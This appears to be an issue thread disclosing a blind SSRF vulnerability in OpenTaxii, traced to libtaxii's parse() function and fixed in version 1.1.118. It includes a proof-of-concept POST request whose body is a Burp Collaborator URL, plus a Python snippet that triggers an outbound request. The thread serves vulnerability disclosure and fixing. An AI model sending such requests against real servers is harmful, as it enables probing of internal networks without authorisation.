Blind SSRF in OpenTaxii

[0wa1s]

Hi,

I and my colleague (Vijay Kota) were testing the opentaxii locally deployed instance and found that it is vulnerable to SSRF issue which can be exploited by adding http://?

Sample POC:

POST /services/discovery HTTP/1.1 Host: 127.0.0.1:9000 Connection: close Accept-Encoding: gzip, deflate Accept: application/xml User-Agent: Cabby 0.1.20 X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1 X-TAXII-Services: urn:taxii.mitre.org:services:1.1 X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1 X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0 Content-Type: application/xml Content-Length: 339

http://ig2vjheeqdul2zwfbfxo31ngk7qxem.burpcollaborator.net?

[traut]

@0wa1s thank you for this awesome find!

I've reproduced the issue and narrowed it down to libtaxii's parse method. Executing

from libtaxii.common import parse
parse("http://test-domain.local?junkdata")

will trigger a GET request to http://test-domain.local?junkdata

The call to parse() happens during validation of the message. In my tests it does not get remediated by calling configure_libtaxii_xml_parser before calling validation.

I've made an issue for libtaxii project

[emmanvg]

A fix has been made available on version 1.1.118

[ghost]

Confirmative, fixed in libtaxii>=1.1.118. https://github.com/TAXIIProject/libtaxii/issues/246

Thank you all :)